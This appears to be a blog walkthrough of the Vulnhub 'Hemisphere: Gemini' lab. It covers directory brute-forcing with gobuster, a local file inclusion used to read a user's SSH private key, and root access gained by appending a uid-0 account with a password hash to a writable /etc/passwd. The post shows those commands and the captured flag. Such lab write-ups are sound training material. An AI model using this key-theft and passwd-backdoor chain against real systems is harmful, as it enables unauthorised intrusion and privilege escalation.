Since my last post I did Brute It on THM and more or less finished TommyBoy from Vulnhub, although I had to consult a write-up for a hint or two on that one. I did most of it myself. I probably won’t write a post about it.


Difficulty: Easy
Flag: 2 (user & root)
Enumeration | Web Application | Privilege Escalation
This works better with VirtualBox rather than VMware

This is HEMISPHERE: GEMINI from Vulnhub.


This one has FTP, SSH, HTTP and SMB, all on their standard ports. However FTP doesn’t support anonymous login and there is nothing obviously available via SMB so they are both distractions. We move forward with HTTP.


robots.txt has three disallowed entries, and none of them exist lol.

Gobuster leads the way:

root@kali:/opt/vulnhub/gemini# gobuster dir -u -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt

This gets a directory called /Portal which has an index page like this:

It was presumably intentional with the view parameter but my first thought was LFI, and it was correct:

This works, and we have a user called william. Probably it’s not as simple as this, right?

Actually, it is.

root@kali:/opt/vulnhub/gemini# ssh -i id_rsa william@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:WJJG9C/ZF8ojVDQF40UEgPCGZMEGwny3luZufN5+K30.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
Linux gemini 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64


william@gemini:~$ pwd


Linpeas says /etc/passwd is writeable. We know what to do with that!

william@gemini:/dev/shm$ echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd
william@gemini:/dev/shm$ su root2
root@gemini:/dev/shm# cd /root
root@gemini:~# ls
root@gemini:~# cat root.txt 
root_flag==> vD1JA8mze74XzkmzOA21R4sjZ

Short, sweet, and done.